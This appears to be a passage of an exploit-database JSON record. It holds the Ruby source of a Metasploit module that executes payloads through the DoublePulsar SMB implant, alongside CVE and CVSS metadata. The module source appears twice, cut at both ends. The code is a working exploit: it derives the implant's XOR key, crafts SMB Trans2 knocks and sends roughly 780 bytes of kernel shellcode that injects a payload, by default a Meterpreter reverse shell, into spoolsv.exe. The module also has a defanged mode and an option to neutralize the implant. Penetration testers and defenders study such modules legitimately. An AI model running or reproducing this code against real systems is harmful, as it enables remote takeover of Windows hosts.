end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-01] #"}, "lastseen": "2021-11-01T00:14:28", "differentElements": ["sourceData"], "edition": 62}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "afbf230ebbf00fdade8aac2595d741bf", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-01T22:21:46", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T22:21:46", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-01T22:21:46", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
